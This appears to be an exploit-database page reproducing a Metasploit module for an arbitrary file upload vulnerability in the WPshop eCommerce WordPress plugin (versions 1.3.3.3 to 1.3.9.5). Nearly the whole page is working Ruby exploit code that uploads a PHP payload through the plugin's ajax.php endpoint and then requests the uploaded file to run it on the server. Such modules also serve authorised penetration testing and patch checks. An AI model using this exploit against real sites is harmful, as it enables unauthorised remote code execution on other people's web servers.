WordPress WPshop eCommerce 1.3.9.5 Shell Upload



EKU-ID: 4792 CVE: OSVDB-ID:
Author: Roberto Soares Espreto Published: 2015-04-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin
        from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote
        code execution. This module has been tested successfully on WordPress WPshop eCommerce
        1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.
      },
      'Author'         =>
        [
          'g0blin', # Vulnerability Discovery, initial msf module
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit Module Pull Request
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '7830'],
          ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['WPshop eCommerce 1.3.9.5', {}]],
      'DisclosureDate' => 'Mar 09 2015',
      'DefaultTarget'  => 0)
    )
  end

  def check
    check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
  end

  def exploit
    php_page_name = rand_text_alpha(5 + rand(5)) + '.php'

    data = Rex::MIME::Message.new
    data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"")
    post_data = data.to_s

    res = send_request_cgi(
      'uri'       => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),
      'method'    => 'POST',
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => post_data
    )

    if res
      if res.code == 200 && res.body =~ /#{php_page_name}/
        print_good("#{peer} - Payload uploaded as #{php_page_name}")
        register_files_for_cleanup(php_page_name)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Server did not answer")
    end

    print_status("#{peer} - Calling payload...")
    send_request_cgi(
      { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) },
      5
    )
  end
end